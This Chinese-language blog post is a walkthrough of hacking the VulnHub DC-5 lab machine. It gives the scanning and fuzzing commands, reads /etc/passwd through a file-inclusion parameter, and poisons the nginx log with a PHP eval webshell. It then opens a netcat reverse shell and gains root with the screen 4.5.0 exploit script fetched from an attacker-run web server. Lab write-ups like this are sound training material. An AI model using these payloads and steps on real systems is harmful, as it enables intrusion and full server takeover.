VulnHub靶机 DC-5 打靶 渗透测试详情过程

2024-04-19 07:04

本文主要是介绍VulnHub靶机 DC-5 打靶 渗透测试详情过程,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

VulnHub靶机 DC-5 打靶 详细渗透测试过程

目录

  • VulnHub靶机 DC-5 打靶 详细渗透测试过程
    • 一、将靶机导入到虚拟机当中
    • 二、渗透流程
      • 主机发现
      • 端口扫描
      • 目录爆破
      • 文件包含
      • getshell
      • 反弹shell
      • 提权

一、将靶机导入到虚拟机当中

靶机地址:

https://download.vulnhub.com/dc/DC-5.zip

image-20240417225232078

image-20240417225114733

二、渗透流程

主机发现

使用arp-scan命令或者nmap命令进行主机发现

arp-scan -l

image-20240417225408386

端口扫描

nmap -p- 192.168.43.192

得到开放了80,111,以及41237端口

image-20240417225530315

扫描端口服务详细信息:

nmap -p80,111,41237 -sV -A 192.168.43.192

image-20240417230005698

访问80端口的web服务:

image-20240417230039242

目录爆破

dirsearch -u http://192.168.43.192 -i 200

暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录

image-20240417230345961

在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动

image-20240417233041872

image-20240417232728160

在contact.php交互界面:

image-20240417233353500

跳转页同样也发生变化:

image-20240417233417873

文件包含

说明这几个目录都包含了/footer.php文件,再次尝试爆破目录

在/thankyou.php基础上爆破

dirsearch -u http://192.168.43.192/thankyou.php -e* -i 200

image-20240417234740154

访问:

image-20240418000829186

目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功

image-20240418000909181

当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破

wfuzz -w  /usr/share/wfuzz/wordlist/general/common.txt http://192.168.43.192/thankyou.php?FUZZ=/etc/passwd

image-20240418003815549

http://192.168.43.192/thankyou.php?file=/etc/passwd

image-20240418003101999

getshell

信息收集发现web服务器为nginx,尝试包含以下日志,查看以下

image-20240418000953791

//日志路径:
/var/log/nginx/access.log

image-20240418003854931

日志信息显示出来了,其中包括url和UA头信息,我们可将一句话木马写进UA头或者url的file参数后面当中,进行getshell

image-20240418004019623

测试是否可解析php语句

image-20240418012041901

成功解析,写入一句话木马

image-20240418012024961

<?php @eval($_POST['cmd']);?>

image-20240418013718220

image-20240418013736006

蚁剑连接,getshell

image-20240418013750654

反弹shell

在蚁剑的虚拟终端执行,bash反弹没有成功,使用nc命令反弹shell

image-20240418015809763

kali端开启监听

nc -lvvp 8888

成功接收到shell

image-20240418015848511

获取稳定shell

python -c "import pty;pty.spawn('/bin/bash')"

提权

//查找suid权限的命令
find / -perm -u=s -type f 2>/dev/null

发现存在一个screen的命令并且版本为4.5.0,搜索一下相关漏洞

image-20240418020059416

进行漏洞检索,然后进行漏洞利用

image-20240418020150008

目标存在wget命令,可进行文件下载,那么kail使用python开启一个http服务,使用wget下载下来

python3 -m http.server 8080

image-20240418020258011

可将两个文件都下载下来,进行查看

image-20240418020351050

给予sh文件执行权限,直接执行一下试试,成功提权

chmod u+x 41154.sh
./41154.sh

image-20240418020524592

文章不妥之处,欢迎批评指正!

这篇关于VulnHub靶机 DC-5 打靶 渗透测试详情过程的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/916861

相关文章

Python实现网格交易策略的过程

《Python实现网格交易策略的过程》本文讲解Python网格交易策略,利用ccxt获取加密货币数据及backtrader回测,通过设定网格节点,低买高卖获利,适合震荡行情,下面跟我一起看看我们的第一... 网格交易是一种经典的量化交易策略,其核心思想是在价格上下预设多个“网格”,当价格触发特定网格时执行买

python设置环境变量路径实现过程

《python设置环境变量路径实现过程》本文介绍设置Python路径的多种方法:临时设置(Windows用`set`,Linux/macOS用`export`)、永久设置(系统属性或shell配置文件... 目录设置python路径的方法临时设置环境变量(适用于当前会话)永久设置环境变量(Windows系统

python运用requests模拟浏览器发送请求过程

《python运用requests模拟浏览器发送请求过程》模拟浏览器请求可选用requests处理静态内容,selenium应对动态页面,playwright支持高级自动化,设置代理和超时参数,根据需... 目录使用requests库模拟浏览器请求使用selenium自动化浏览器操作使用playwright

Mysql中设计数据表的过程解析

《Mysql中设计数据表的过程解析》数据库约束通过NOTNULL、UNIQUE、DEFAULT、主键和外键等规则保障数据完整性,自动校验数据,减少人工错误,提升数据一致性和业务逻辑严谨性,本文介绍My... 目录1.引言2.NOT NULL——制定某列不可以存储NULL值2.UNIQUE——保证某一列的每一

解密SQL查询语句执行的过程

《解密SQL查询语句执行的过程》文章讲解了SQL语句的执行流程,涵盖解析、优化、执行三个核心阶段,并介绍执行计划查看方法EXPLAIN,同时提出性能优化技巧如合理使用索引、避免SELECT*、JOIN... 目录1. SQL语句的基本结构2. SQL语句的执行过程3. SQL语句的执行计划4. 常见的性能优

linux下shell脚本启动jar包实现过程

《linux下shell脚本启动jar包实现过程》确保APP_NAME和LOG_FILE位于目录内,首次启动前需手动创建log文件夹,否则报错,此为个人经验,供参考,欢迎支持脚本之家... 目录linux下shell脚本启动jar包样例1样例2总结linux下shell脚本启动jar包样例1#!/bin

java内存泄漏排查过程及解决

《java内存泄漏排查过程及解决》公司某服务内存持续增长,疑似内存泄漏,未触发OOM,排查方法包括检查JVM配置、分析GC执行状态、导出堆内存快照并用IDEAProfiler工具定位大对象及代码... 目录内存泄漏内存问题排查1.查看JVM内存配置2.分析gc是否正常执行3.导出 dump 各种工具分析4.

Linux进程CPU绑定优化与实践过程

《Linux进程CPU绑定优化与实践过程》Linux支持进程绑定至特定CPU核心,通过sched_setaffinity系统调用和taskset工具实现,优化缓存效率与上下文切换,提升多核计算性能,适... 目录1. 多核处理器及并行计算概念1.1 多核处理器架构概述1.2 并行计算的含义及重要性1.3 并

Spring boot整合dubbo+zookeeper的详细过程

《Springboot整合dubbo+zookeeper的详细过程》本文讲解SpringBoot整合Dubbo与Zookeeper实现API、Provider、Consumer模式,包含依赖配置、... 目录Spring boot整合dubbo+zookeeper1.创建父工程2.父工程引入依赖3.创建ap

Linux下进程的CPU配置与线程绑定过程

《Linux下进程的CPU配置与线程绑定过程》本文介绍Linux系统中基于进程和线程的CPU配置方法,通过taskset命令和pthread库调整亲和力,将进程/线程绑定到特定CPU核心以优化资源分配... 目录1 基于进程的CPU配置1.1 对CPU亲和力的配置1.2 绑定进程到指定CPU核上运行2 基于